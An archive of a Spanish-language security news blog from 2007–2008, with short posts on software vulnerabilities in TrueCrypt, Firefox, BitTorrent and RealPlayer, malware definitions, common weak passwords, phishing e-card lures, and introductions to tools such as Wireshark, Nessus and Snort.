Seguridad Segura

Vulnerabilidad en Truecryp

2008-07-21T09:19:00.001-03:00

El pasado viernes Bruce Schneier publicó un interesante análisis sobre diversas vulnerabilidades encontradas en la versión 5.1a el software de cifrado Truecrypt, cuyo uso está bastante extendido.

En Security ArtWork analizamos los diversos escenarios de riesgo y proponemos soluciones, de diversos grados de paranoia, a estas vulnerabilidades.

Fuente: Barrapunto

La primera actualización de Firefox 3

2008-07-17T16:39:00.001-03:00

Firefox 3.0.1 es la nueva actualización para solucionar los tres fallos críticos de seguridad según afirmo Mozilla.

El primero hace caer al navegador al tratar de abrir un GIF malformado en Mac OS X.
El segundo, descubierto por Billy Rios, afecta curiosamente a Firefox cuando no está funcionando. Si se pasa una URL con algún caracter "|" desde la línea de comandos se pueden ejecutar URIs de tipo "chrome", lo que permite explotar otras posibles vulnerabilidades.
El tercero permite sobrecargar el contador de objetos CSS y colgar el navegador, abriendo la puerta a una posible ejecución de código. Este fallo afecta también a Thunderbird y Seamonkey.

Paralelamente se ha publicado también Firefox 2.0.0.16, que corrige los dos últimos fallos pero en la serie 2...

Fuente: Kriptopolis

El nuevo iPhone ya fue Hackeado

2008-07-12T11:33:00.002-03:00

La verdad que este tipo de noticias ya no produce mucha impresión, la nueva versión del firmware del iPhone ya ha sido hackeada.

El Jailbreak ha sido llevado a cabo por el iPhone Dev Team, como no, al que cada vez se le resisten menos las actualizaciones de Apple.

Para aquellos seguidores de estos productos, podemos decir que aún no se encuentra disponible esta actualización, sin embargo ya fue anunciada para muy pronto.

Fuente: HispaMP3

Symantec alerta de un nuevo agujero en Word

2008-07-09T21:31:00.001-03:00

Los crackers podrían haber encontrado una forma de atacar los PCs a través de una vulnerabilidad que Symantec cree haber detectado en el software de Microsoft Word.

Lo claro es que esta compañía de antivirus de inmediato se encuentra trabajando para reducir esas sospechas bajo varias versiones de Microsoft Word.

En los últimos años, los crackers han encontrado múltiples formas de atacar a la suite ofimática de Microsoft, y este último ataque sigue el mismo patrón. Se trata de engañar a la víctima haciéndole abrir un documento Office que contiene código maligno, a través del cual se instala el software “intruso” en el PC.

En este caso, el código maligno es un troyano llamado Backdoor.Darkmoon, que rastrea los movimientos de teclas de las víctimas para robar las contraseñas.

Symantec dice que su software detecta el ataque, pero recomienda no abrir ningún documento Word sospechoso.

Artículo completo: The Inquirer ES

Que es TrueCrypt

2008-07-08T12:59:00.002-03:00

TrueCrypt es una aplicación libre que permite crear volúmenes de cifrado, de tal forma que todo lo que contenga este disco virtual, partición de disco o unidad de almacenamiento USB solo pueda ser accedido si conoce la contraseña y/o archivo clave que se utilizó al momento que fue creado.

Una particularidad muy interesantes es que el cifrado y el descifrado se realiza en memoria RAM, de forma totalmente transparente al usuario antes de ser almacenado o escrito en el disco.

Esta aplicación es multiplataforma por tal motivo podemos realizar encriptaciones en Windows y desencriptarlo en GNU/Linux o viceversa.

Para más información podes ingresar el sitio oficial del proyecto TrueCrypt

Simulador para Hacker

2008-07-07T10:48:00.001-03:00

Hoy se dió a conocer un juego que a muchos puede llegar a gustarle. En Hacker Simulator y Hacker Evolution pueden ponerse a prueba con sus conocimientos de hacking. El juego no presenta grandes dificultades y tenemos la posibilidad de contar con ayuda en el boton “Hint”.

Comenzá a demostrar todos tus conocimiento de Hacker con la ayuda de este simulador.

Tips de Seguridad para Facebook

2008-07-03T10:41:00.002-03:00

Lamentablemente por falta de tiempo, abandonamos un poco el blog de Seguridad Segura, les prometo que a partir de ahora vamos a comenzar a actualizarlo y a ser más constante. Gracias por seguir hay acompañandonos.

En estos días encontré en varios sitios de seguridad un documento que nos muestra un poco de seguridad para tener en cuenta en la red social mas grande del mundo, por supuesto que hablamos de Facebook.

La incorporación de imágenes, videos y sonidos y la combinación de estas redes con servicios como Youtube.com, hacen que los perfiles o fichas personales de cada usuario sean verdaderos resúmenes de información, diarios íntimos y álbumes de fotos personales, soñadas solo por madres y abuelas de todo el mundo. Estas páginas web almacenan datos que sirven para obtener desde el perfil psicológico, hasta datos personales como fechas de nacimiento, que pueden ser utilizados por Ciberdelincuentes en la suplantación de identidades en Internet para obtener acceso a cuentas bancarias en línea y para el uso de servicios web. Sirven también estos datos para dar todo tipo información a hampones y organizaciones criminales del mundo real y físico.

Descarga desde AQUI los Tips de Seguridad para Facebook

En busca de Hackers, documental

2008-03-10T23:31:00.001-02:00

Este es un documental, pretende cambiar nuestras ideas preconcebidas de lo que es un hacker e introducirnos en la nueva era de la tecnología.

preconcebidas de lo que es un hacker e introducirnos en la nueva era de la tecnología.

Artículo completo dragonjar

Instalando y Ejecutando Wireshark

2008-03-10T22:40:00.011-02:00

En esta oportunidad vamos a ver como poner en funcionamiento Wireshark.
Primero para instalarlo vamos a Konsola, Yakuake o lo que usen, y coloquen

$ sudo apt-get install wireshark

Una vez instalado lo ejecutamos como root

$ sudo wireshark

Y nos abre la siguiente ventana

Con el primer boton nos muestra las diferentes placas de red disponibles en esta pantalla

Podemos cliquear sobre el boton start de la placa de red que quisieramos chequear y comienza a mostrarnos en tiempo real los paquetes que envia y recibe la computadora por medio de la placa seleccionada
La siguiente imagen muestra mas o menos lo que se ve en el momento de la captura

La ventana se divide en 3 filas que nos muestran los paquetes enviado y recibidos, y también información de los mismo.

Con el segundo boton accedemos a las propiedades de la captura que queremos hacer

Acá podemos determinar también, con que placa se va a realizar el escaneo, como así también si queremos colocar algun filtro de paquetes, en que archivo se va a guardar los datos capturados, y otra serie de opciones bastante interesantes para investigar.

Pero con esto les va a servir como para arrancar a mirarlo, porque lo poco que estuve viendo y leyendo tiene un gran potencial y puede ser utilizado como herramienta para auditorias informáticas.
Solo queda en uds. postear lo que vayan aprendiendo, porque el conocimiento es de todos y para todos.

Una Herramienta para Sniffing

2008-03-10T22:27:00.005-02:00

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de software y protocolos, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos.

La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.

Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.

Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, y Mac OS X, así como en Microsoft Windows.

Virus Total

2008-02-11T12:37:00.000-02:00

En esta oportunidad les quería recomendar un servicio propuesto por la gente de Hispasec. Se trata de un analizador de Archivos sospechosos que nos permite detectar virus, troyanos, gusanos y malwares en general.

Como característica fundamental encontramos:

Servicio independiente y GRATUITO.
Uso simultáneo de múltiples motores antivirus.
Actualización automática de motores antivurus en tiempo real.
Resultado detallado de cada antivirus.
Estadísticas globales en tiempo real.

Como funciona esto? Es muy simple, si sospechas de algún archivo entonces es posible analizarlo, entrando al sitio de esta herramienta Virus Total, te vas a encontrar con un cuadro de texto para subir el archivo sospechado y al instante comenzará a analizar el mismo.

Te lo recomendamos para que lo pruebes y hagas uso de esta herramienta gratuita y en línea.

Algunas definiciones interesantes

2008-02-10T22:58:00.000-02:00

Antivirus
Los antivirus son programas cuya función es detectar y eliminar virus informáticos y otros programas maliciosos (a veces denominados malware).
Un virus informático es un programa que se copia automáticamente y que tiene por objeto alterar el funcionamiento de la computadora, sin el permiso o el conocimiento del usuario.

Bots
Un bot (diminutivo de robot) es un programa informático que realiza muy diversas funciones imitando a los humanos. Pueden abrir cuentas en sitios de correo electrónico gratuito, por lo que ahora la mayoría de esos sitios cuenta con un paso adicional en el que el usuario debe escribir una palabra presentada en formato gráfico; algo muy difícil de interpretar para un bot ya que no reconoce el texto contenido en una imagen.

Gusano
Es un virus o programa que se auto replica, no altera los archivos, sino que reside en la memoria y se duplica a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que
generalmente son invisibles al usuario.
Es algo usual detectar la presencia de gusanos en un sistema cuando, debido a su incontrolada replicación, los recursos del sistema se consumen hasta el punto de que las tareas ordinarias del mismo son excesivamente lentas o simplemente no pueden ejecutarse.

Malware
La palabra malware proviene de una agrupación de las palabras (malicious
software). Este programa o archivo, que es dañino para el ordenador, está
diseñado para insertar virus, gusanos, troyanos, spyware o incluso los bots,
intentando conseguir algún objetivo, como podría ser el de recoger información
sobre el usuario o sobre el ordenador en sí.

Phishing
Phishing es un término utilizado en informática con el cual se denomina el uso de un tipo de ingeniería social, caracterizado por intentar adquirir información confidencial de forma fraudulenta, como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria. El estafador, mejor conocido como phisher se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico o algún sistema de mensajería instantánea.

Rootkit
Un rootkit es una herramienta, o un grupo de ellas usadas para esconder los procesos y archivos que permiten al intruso mantener el acceso al sistema, a menudo con fines maliciosos.
Un rootkit oculta inicios de sesión, procesos, archivos y registros. Puede incluir software para interceptar datos procedentes de terminales, conexiones de red e incluso el teclado. Los rootkits son habitualmente considerados troyanos.

Spam
Spam son mensajes no solicitados, habitualmente de tipo publicitario, enviados en cantidades masivas, y que buscan un beneficio a nivel personal o corporativo. Aunque se puede hacer por distintas vías, la más utilizada entre el público en general es la basada en el correo electrónico. El spam también puede tener como objetivo los teléfonos móviles y los sistemas de mensajería instantánea. En España el spam está terminantemente prohibido por la Ley de Servicios de

la Sociedad de la Información y de Comercio Electrónico, publicada en el BOE del 12 de julio de 2002. Aparte, a los poseedores de bases de datos de correos electrónicos se les podría aplicar la Ley Orgánica de Protección de Datos por tratarse de datos de carácter personal. De hecho, las sentencias en España referidas al spam están relacionadas con esta ley.

Spyware

Los programas espía o spyware son aplicaciones que recopilan información sobre una persona u organización sin su conocimiento. La función más común que tienen estos programas es la de recopilar información sobre el usuario y distribuirlo a empresas publicitarias. Además pueden servir para enviar a los suarios a sitios de Internet que tienen la imagen corporativa de otros, con el objetivo de obtener información importante.

Troyano
Se denomina troyano a un programa malicioso capaz de alojarse en computadoras y permitir el acceso a usuarios externos, a través de una red local o de Internet, con el fin de recabar información o controlar remotamente a la máquina anfitriona, pero sin afectar al funcionamiento de ésta. La diferencia fundamental entre un troyano y un virus consiste en su finalidad.
Para que un programa sea un "troyano" solo tiene que acceder y controlar la máquina anfitriona sin ser advertido. Al contrario que un virus, que es un huésped destructivo, el troyano evita provocar daños porque no es su objetivo.

Un grupo de hackers decidirá cuál es el SO más seguro

2008-02-10T22:39:00.000-02:00

Windows, Linux y Apple se someterán al examen de los hackers, que participarán en un concurso para probar su seguridad.

El congreso CanSecWest, que cada año reúne a los mejores hackers del planeta tratará de determinar en su edición de 2008, que se celebrará en Vancouver entre el 26 y el 27 de marzo, cuál es el sistema operativo menos vulnerable.

Según el organizador del evento, Dragos Ruiu, el evento permitirá conocer qué sistema es más seguro entre el Leopard X, de Apple, Vista, de Windows, y una versión aún por determinar de Linux. “La idea se nos ocurrió porque es difícil saber la verdad”, asegura Ruiu, que critica el desconcierto que existe entre la propaganda que producen los seguidores de cada uno de los tres sistemas operativos.

En su anterior edición, este congreso de “hacktivismo ético” fue el escenario del primer hackeo del MacBook Pro, que reportó un premio de 10.000 dólares al ganador. Más información en Silicon.fr

LOS 10 PASSWORD MÁS USADOS EN EL MUNDO

2008-02-10T22:38:00.000-02:00

Los internautas no tenemos demasiado cuidado en la elección de nuestras contraseñas; es lo que se extrae de lo que publica Steve Johnson en Chicago Tribune, un listado de las diez claves de acceso más comunes en la red que deja mucho que desear en cuanto a seguridad se refiere.

Con contraseñas como "password", "123456", "qwerty" o "abc123", muchos "piratas" informáticos deben estar encantados de poder acceder a cuentas de correo, páginas privadas y contenidos poco protegidos.

El "top ten" de la imprudencia

1. password
2. 123456
3. qwerty
4. abc123
5. letmein
6. monkey
7. myspace1
8. password1
9. blink182
10. (tu nombre)

Hasta ponen ejemplo: por una contraseña aleatoria de seis caracteres se tardan unos cinco minutos en dar con la clave; si se combinan las mayúsculas y las minúsculas se amplía el tiempo a más de ocho días.

Si además suele utilizar las contraseñas para varios sitios, puede tener un serio problema; pero no se apure, en la propia red se pueden obtener gestores de contraseñas mucho más seguros, y otros consejos que le ayudarán a mantener a buen recaudo su privacidad.

La lista no es muy diferente a la publicada el año pasado por la página alemana para buscar amistades y pareja FlirtLife, que detectó que de un total de 100.000 passwords de sus clientes, un 1,4 por ciento correspondía a la secuencia 123456 y un 2,5 por ciento comenzaba con 1234.

Además, otras palabras que se repetían con frecuencia eran hello, password, baby y Frankfurt. Como consecuencia de este descubrimiento, el portal decidió enviar un mail de advertencia a todos los usuarios, alertándolos de que estaba en peligro la privacidad de su información.

Llegan los SMS certificados

2008-02-06T15:32:00.000-02:00

El Ayuntamiento de Lleida ha puesto en marcha el primer servicio de mensajes de texto (SMS) certificados, de modo que podrá comunicar notificaciones oficiales con validez legal a los ciudadanos a través del telófono móvil.

(Servimedia) "Creemos en el papel de las Administraciones Públicas como impulsor de la sociedad del conocimiento", afirmó en rueda de prensa el alcalde de Lleida, Angel Ros, tras recordar que en 2010 los poderes públicos deberán cumplir con las exigencias de la Ley de Acceso Electrónico a la Administración.

Además de la simplificación burocrática, otra de las bazas para el Ayuntamiento, según explicó el alcalde, es que permitirá que los funcionarios que ahora se encargan de enviar notificaciones certificadas se dediquen a otros cometidos.

La empresa que ha creado y patentado el proyecto "SMS Certificado" es Lleida.net, una compañía con 20 empleados especializada en envío de mensajes de texto. Una de sus principales fuentes de ingresos son los partidos políticos, que la contratan para realizar envíos masivos de SMS.

El presidente de Lleida.net, Sisco Sapena, explicó que el objetivo de facturación de este servicio para su primer año de funcionamiento es de un millón de euros y que la inversión inicial ha sido de 500.000 euros. El precio del envío de un SMS es de 60 céntimos de euro.
Automático, rápido y ecológico

"La certificación es muy rápida y todo el proceso dura unos segundos. Además, permite envíos automatizados a varios miles de destinatarios, y resulta ecológico porque no utiliza ni papel ni tinta en el proceso", apuntó.

El procedimiento para enviar un SMS certificado consiste en que el usuario -en este caso, el Ayuntamiento de Lleida- envía un SMS a través de Internet, de modo que el mensaje llega a través de la interconexión con un operador móvil.

Después, Lleida.net envía el acuse de recibo a través de Internet a la Autoridad de Certificación para "estampar" digitalmente el sello oficial. Por último, el acuse de recibo es enviado por "e-mail" al usuario, que lo puede utilizar con carácter de prueba antes terceros.

Según afirmó Sapena, otros municipios españoles y europeos (el servicio es válido para la UE) están "muy interesados" en implantar el "SMS Certificado", de modo que se empezará a utilizar en otras localidades "de forma inminente". También apuntó que hay varias compañías europeas y estadounidenses interesadas en comprar la patente, aunque eludió dar nombres.

De momento, el Ayuntamiento de Lleida ha comenzado a aplicar este servicio para procedimientos relacionados con temas de urbanismo, oposiciones, subvenciones y convocatorias públicas.

Artículo completo HispaMP3

Ejecución remota de código en BitTorrent y uTorrent

2008-01-31T14:40:00.000-02:00

BitTorrent y uTorrent, son propensos a una vulnerabilidad que permite a un atacante la ejecución remota de código. Son afectadas las versiones para Windows, Mac y Linux (estas últimas solo existen en BitTorrent).
El problema se debe a que la aplicación no realiza un correcto filtrado de la información enviada por el usuario.

Ambos son los clientes más populares utilizados para descarga de archivos P2P, utilizando el protocolo bittorrent, y fueron creados a partir del mismo código base.

Por defecto, los dos programas muestran una ventana con información detallada acerca del estado de la red y los rastreadores en uso, además de datos sobre otros clientes conectados, tales como el porcentaje de disponibilidad del torrent compartido, su dirección IP, país, velocidad, la cantidad de datos recibidos y enviados, y la versión del cliente.

Cuando el contenido de la ventana es visualizado por el usuario, estos datos (cadenas en formato unicode), son copiados a un búfer utilizado por la interfase gráfica.

Si esta cadena supera un determinado tamaño, puede sobrescribir información crítica, provocando el fallo del programa.

La explotación puede ser posible si un atacante se conecta a un puerto al azar abierto en el cliente, y envía datos manipulados para superar ciertos límites.

Cuando esta vulnerabilidad fue hecha pública, con prueba de concepto incluida, se pensaba que un ataque solo podría hacer que el programa dejara de responder, provocando una denegación de servicio. Información más reciente indica que la ejecución arbitraria de código con los mismos privilegios del usuario actual, es posible,

La vulnerabilidad afecta a los siguientes productos:

- BitTorrent 6.0 (y versiones anteriores)
- uTorrent 1.7.5 (y versiones anteriores)
- uTorrent 1.8-alpha-7834 (y versiones anteriores)

Se sabe que uTorrent 1.7.6, liberado inmediatamente después de haberse conocido la vulnerabilidad, corrige el problema.

También lo habría solucionado la versión 6.0.1 de BitTorrent, pero no ha sido confirmado al momento de publicarse esta alerta de seguridad.

Los usuarios de uTorrent pueden descargar la nueva versión desde el siguiente enlace:
download.utorrent.com/1.7.6/utorrent.exe

BitTorrent 6.0.1 está disponible en el siguiente enlace:
www.bittorrent.com/download?csrc=header

Fuente: segu-info

BackTrack

2008-01-27T15:46:00.000-02:00

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve entorno a la seguridad informática.

Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.

WHAX a su vez fue la evolución del Whoppix(WhiteHat Knoppix) el cual paso a basarse en SLAX en lugar de en Knoppix.

Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.

Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org

Puede encontrarse más información en la página de Backtrack, desde donde también es posible descargarla.

Fuente: Wikipedia

Exploit para primera vulnerabilidad de Windows en 2008

2008-01-27T15:05:00.000-02:00

Se ha reportado la existencia de un exploit que se aprovecha de la primera vulnerabilidad de Microsoft Windows de 2008.

La vulnerabilidad, cuyo parche ha sido publicado en el primer boletín del año (MS08-001), fue catalogada como crítica para Windows XP y Vista. Sin embargo, su peligrosidad fue minimizada por comentarios del propio jefe del equipo de seguridad de Microsoft, Jonathan Ness.

Según Ness, aunque el boletín es considerado “crítico”, “existe una serie de factores que hacen que explotar esta vulnerabilidad sea muy difícil y poco probable”.

El problema afecta el procesamiento del Protocolo de control de transmisión / Protocolo de Internet (TCP/IP), un conjunto de protocolos de comunicaciones que se usan para transmitir datos a través de las redes.

Según el boletín, un atacante que se aproveche de esta vulnerabilidad, podría lograr el control completo de un sistema afectado, incluyendo la instalación de software, o la creación de nuevas cuentas con todos los derechos de usuario.

El argumento de Ness, sobre la dificultad de sacar provecho de este fallo, queda ahora en duda, luego de conocerse la existencia del exploit.

Algunos analistas piensan que Microsoft sobrestimó la dificultad de crear un exploit. La posibilidad de crear una forma de ataque confiable parece ser un hecho, aunque sea difícil de automatizarlo, debido a la propia naturaleza del problema (se necesita controlar decenas de miles de paquetes).

Sin embargo, la rentabilidad sería muy alta, ya que esto tiene el potencial de comprometer a numerosos sistemas a la vez, comenta la empresa de seguridad Symantec.

La aparición de un exploit, subraya el interés por esta vulnerabilidad, y pone en riesgo a miles de usuarios que no han actualizado sus sistemas con los últimos parches.

Immunity Inc., compañía creadora del software CANVAS que es utilizado para pruebas de penetración (pen-test), informó que su herramienta fue actualizada para hacer pruebas que afectan a Windows, valiéndose de la vulnerabilidad mencionada.

Dave Aitel, director de tecnología de Immunity, predijo que ésta vulnerabilidad podría llegar a ser una de las más grandes.

Se recomienda a los usuarios de Windows Vista y Windows XP, actualizar su sistema lo antes posible, instalando los parches mencionados, especialmente el descrito en el boletín MS08-001

Fuente: Segu-Info

Nueva vulnerabilidad en Firefox permite saltar directorios y acceder a información

2008-01-25T00:04:00.000-02:00

Seguimos con el manejo de las URIs y sus secuelas. Ahora es Gerry Eisenhaur quien avisa que el esquema chrome: URI permite saltar entre directorios, de modo que la visita a una web maliciosa puede proporcionar a un atacante información sobre las aplicaciones instaladas, siempre que la víctima tenga además instalada algunas de las extensiones que utilizan una estructura simple de ficheros de texto, en lugar de ficheros jar (Greasemonkey o la barra de descargas, por ejemplo).

Mozilla ha reconocido el problema y ya está en ello. Mientras tanto, y como siempre, NoScript es tu amigo.

Artículo completo Segu-Info

20.000 dólares por encontrar vulnerabilidades en Windows

2008-01-18T00:44:00.000-02:00

Una compañía de seguridad informática desconocida, denominada Digital Armaments, ha puesto en marcha el concurso Hacker’s Challenge, que ofrece 20.000 dólares a quien revele información sobre agujeros de seguridad no descubiertos en Windows.

Para acceder al concurso hay que probar y documentar antes del 29 de febrero nuevos exploit o amenazas de tipo “Zero day” que no hayan sido detectadas por empresas de seguridad.

Aunque no es ilegal que las compañías de seguridad o investigación paguen por detectar vulnerabilidades, este tipo de concursos no suelen sentar muy bien en las grandes compañías de software como Microsoft, en el que las vulnerabilidades de seguridad suelen ser de perfil alto y los de Redmond abogan porque los investigadores comuniquen discretamente el problema para no poner en riesgo a los usuarios. Además las empresas no suelen pagar por las vulnerabilidades de software.

En todo caso desde InfoWorld han intentado ponerse en contacto con “Digital Armaments” sin conseguirlo. La empresa no tiene accesible dirección ni número de teléfono lo que hace sospechar de esta “competición”.
Artículo Segu-info

¿Quién inventó el concepto de firewall?

2008-01-16T12:44:00.000-02:00

Muchos se atribuyen la creación de esta tecnología de seguridad, pero en realidad el mérito no es de una sóla persona: muchos contribuyeron a hacer que una idea que estaba en mente de muchos cristalizase finalmente.

Nir Zuk, David Pensak, Marcus Ranum o Jeff Mogul, entre otros, se proclaman creadores de este concepto, pero en realidad la idea de firewall surgió como una combinación de todas sus propuestas a la hora de proteger el acceso a máquinas y redes de ordenadores. Incluso William Cheswick y Steven Bellovin, que escribieron un célebre libro al respecto (”Firewalls and Internet Security”, Addison-Wesley, 1994) tuvieron mucho que ver en ese descubrimiento.

Como indican en DarkReading, el vicepresidente de Gartner, John Pescatore, lo explica según su propia visión: “Cheswick y Bellovin fueron los padres del concepto de firewall de red: usar filtrado de paquetes para denegar el acceso a todo lo que no esté específicamente permitido. Ranum fue el padre del primero “producto” firewall - DEC SEAL, que era Open Source”.

El resto de personajes contribuyeron de forma definitiva a darle sentido completo a la idea, de modo que parece que no hay un único creador.

No importa demasiado: los firewalls siguen siendo un mecanismo importante a la hora de tratar de proteger un PC - o red de PCs - ante ataques externos.

Segu-Info

Videos y fotos de la ejecución de Saddam que contienen virus informáticos y spyware

2008-01-13T02:23:00.000-02:00

Los crackers han evolucionado en sus métodos malévolos y están atacando con campañas masivas de spam con videos y fotos de la ejecución de Saddam Hussein que esconden en su interior virus informáticos y spyware.

Un virus ha sido identificado como "Banload" y contiene el archivo "Saddam morto.scr", el otro sería el "Delf.acc" que contiene al archivo "saddam.exe". Estos virus tienen el objetivo de lucrarse mediante el robo de identidades y claves bancarias para después limpiar las cuentas de sus propietarios.

Artículo completo Shell Security

"Troyano" para iPhone

2008-01-10T16:38:00.000-02:00

Se confirma la existencia de un troyano para el iPhone. Este troyano se ejecuta en los iPhones liberados y podría instalar aplicaciones en los mismos, apareciendo para ello como una actualización al programa Erica’s Utilities, con el nombre de 113.prep.

Lo que hace es presentar la palabra "shoes" y a quitarla, se elimina la carpeta /bin en el iPhone rompiendo así aplicaciones válidas como Sendfile y Erica’s Utilities.

Nada grave al menos por ahora.

Artículo completo Segu-Info

Vulnerabilidad crítica y muy peligrosa con la técnica “SQL injection”

2008-01-10T13:51:00.000-02:00

Se ha detectado un ataque con la técnica SQL injection que afecta a sitios web vulnerables que funcionan en servidores IIS y MS SQL. Si se expande, empezará a afectar a sitios web PHP+MySQL.

Como explican en Internet Storm Center, cuando haces una búsqueda al sitio uc8010.com en Google, obtienes miles de sitios que señalan todos a uc8010.com. Esto es así porque existe un script automatizado o un ataque SQL injection en las aplicaciones vulnerables de la web. Este ataque ya se detectó en noviembre, pero al parecer ha sido ahora extendido y mejorado.

Casi todos los sitios afectados funcionan sobre servidores IIS y MS SQL. Esto parece lógico ya que el extracto SQL del ataque funcionará sólo en servidores MS SQL. En el artículo original recomiendan soluciones temporales como las de instalar un firewall de aplicaciones web o un ‘reverse proxy’, pero ambos parches sólo serán soluciones temporales, así que habrá que estar atentos a posibles incidencias en los servidores.

Artículo completo The Inquirer ES

Los códigos de barras tienen agujeros de seguridad

2008-01-07T12:03:00.000-02:00

Según investigación, los antiguos y generalizados códigos de barras tienen agujeros de seguridad que pueden ser aprovechados con fines delictivos, concluye investigación.

A menudo, los delitos informáticos son relacionados con usurpación de identidad, suplantación de instituciones financieras y robos de números de tarjetas de crédito. Sin embargo, también es posible intervenir tecnologías más anticuadas, como los conocidos códigos de barras negras.

En una conferencia de seguridad realizada en Berlín, el denominado grupo Phenoelit presentó diversos ejemplos que confirman que en muchos casos es posible copiar los códigos de barra originales, y alterarlos para obtener un beneficio económico. Los códigos de barra unidimensionales fueron inventados en la década de 1940, y los primeros lectores de códigos de barras fueron lanzados en la década de 1970. No sorprende entonces que sea posible alterar tales códigos. La tecnología es usada en muchos lugares, especialmente en supermercados y estacionamientox. Por ejemplo, el grupo Phenoelit informó sobre un centro de estacionamiento en Alemania donde era posible obtener estacionamiento gratuito debido a que el pago con código de barras no incorporaba un sistema de comprobación.

Un sistema similar podría ser usado para alterar los precios en supermercados, con el fin de pagar por ellos un precio inferior al real.

Artículo completo DiarioTI

PassPub, el generador de contraseñas

2008-01-06T23:33:00.001-02:00

Les presento esta herramienta llamado PassPub, un herramienta que nos va a permitir generar Contraseñas seguras de manera muy fácil y sencilla.

Obviamente ya sabemos que la seguridad de las contraseñas estan acompañadas por el secreto de las mismas y la actualización periódicas.

PassPub nos permite generar contraseñas de 64, 128 o 256bits para redes inalámbricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, combinaciones basadas en la tabla periódica y otras combinaciones.

Vulnerabilidad en RealPlayer 11 puede ejecutar código

2008-01-02T10:17:00.000-02:00

RealPlayer es propenso a una vulnerabilidad no especificada del tipo desbordamiento de búfer, que puede permitir a un atacante la ejecución remota de código, o que la aplicación deje de responder.

El problema, del cuál existe como prueba de concepto una demostración animada, se produce por un error del programa en manejar adecuadamente los límites de cierta información suministrada por el usuario, antes de volcar la misma a un búfer de tamaño inadecuado.

Si un atacante remoto convence al usuario a abrir un archivo multimedia malicioso, y en el sistema está presente RealPlayer 11, puede lograr la ejecución de un malware o cualquier otro programa que desee.

artículo completo VSAntivirus

Algunas Herramientas para PenTest

2007-12-29T17:00:00.000-03:00

Nessus
Auditor de Seguridad Remoto. El cliente "The Nessus Security Scanner" es una herramienta de auditoría de seguridad. Hace posible evaluar módulos de seguridad intentando encontrar puntos vulnerables que deberían ser reparados. Está compuesto por dos partes: un servidor, y un cliente. El servidor/daemon, "nessusd" se encarga de los ataques, mientras que el cliente, "nessus", se ocupa del usuario por medio de una linda interfaz para X11/GTK+. Este paquete contiene el cliente para GTK+1.2, que además existe en otras formas y para otras platarformas.

Netcat
Una navaja multiuso para TCP/IP. Una utilidad simple para Unix que lee y escribe datos a través de conexiones de red usando los protocolos TCP o UDP. Está diseñada para ser una utilidad del tipo "back-end" confiable que pueda ser usada directamente o fácilmente manejada por otros programas y scripts. Al mismo tiempo, es una herramienta rica en características útil para depurar (debug) y explorar, ya que puede crear casi cualquier tipo de conexión que puedas necesitar y tiene muchas características incluídas.

Tcpdump
Una poderosa herramienta para el monitoreo y la adquisición de datos en redes. Este programa te permite volcar (a un archivo, la pantalla,etc.) el tráfico que presenta una red. Puede ser usado para imprimir los encabezados de los paquetes en una interfaz de red ("network interface") que concuerden con una cierta expresión. Se puede usar esta herramienta para seguir problemas en la red, para detectar "ping attacks" o para monitorear las actividades de una red.

Snort
un Sniffer/logger de paquetes flexible que detecta ataques. Snort está basado en la biblioteca `libpcap' y puede ser usado como un "sistema de detección de intrusiones" (IDS) de poco peso. Posee un registro basado en reglas y puede buscar/identificar contenido además de poder ser usado para detectar una gran variedad de otros ataques e investigaciones (probes), como buffer overflows, barridos de puertos indetectables (stealth port scans), ataques CGI, pruebas de SMB (SMB probes), y mucho más. Otra característica importante de Snort es la capacidad de alertar en tiempo real, siendo estas alertas enviadas a syslog, un archivo de alerta separado o incluso a una computadora con Windows a través de Samba.

Saint
SAINT (Security Administrator's Integrated Network Tool, o sea, Herramienta De Red Integrada Del Adminstrador de Seguridad) es una herramienta de evaluación de seguridad basada en SATAN. Incluye escaneos _a_través_ de un firewall, chequeos de seguridad actualizados de los boletines de CERT Y CIAC, 4 niveles de severidad (rojo, amarillo, marrón y verde) y una interfaz HTML rica en características.

Ethereal
Ethereal es un analizador de tráfico de redes, o "sniffer" para Unix y Sistemas operativos del tipo Unix. usa GTK+, una biblioteca de interfaz gráfica para el usuario (GUI), y libcap, una bliblioteca que facilita la captura y el filtrado de paquetes.

Artículo completo: Zona Gratuita

Cuidado con las tarjetas de felicitación electrónicas

2007-12-28T00:54:00.000-03:00

Según reporta el SANS Internet Storm Center, aumentaron estos días los ataques de spam con enlaces a troyanos que convierten la PC de quienes caen en la trampa de seguir el enlace, en una máquina zombi.

Los más recientes, incluyen tarjetas de felicitaciones electrónicas, con temas relacionados con el nuevo año.

Algunos de los asuntos (y textos), utilizados por estos mensajes:

A fresh new year
As the new year...
As you embrace another new year
Blasting new year
Happy 2008!
Happy New Year to [dirección electrónica]
Happy New Year to You!
Happy New Year!
It's the new Year
Joyous new year
Lots of greetings on the new year
New Hope and New Beginnings
New Year Ecard
New Year Postcard
New Year wishes for You
Opportunities for the new year
Wishes for the new year

Los equipos infectados se convierten en auténticos zombis, recibiendo y ejecutando ordenes, recibidas a través de una o varias redes de computadoras también infectadas, que forman parte de extensas botnets (redes de equipos autómatas, controlados por uno o más atacantes).

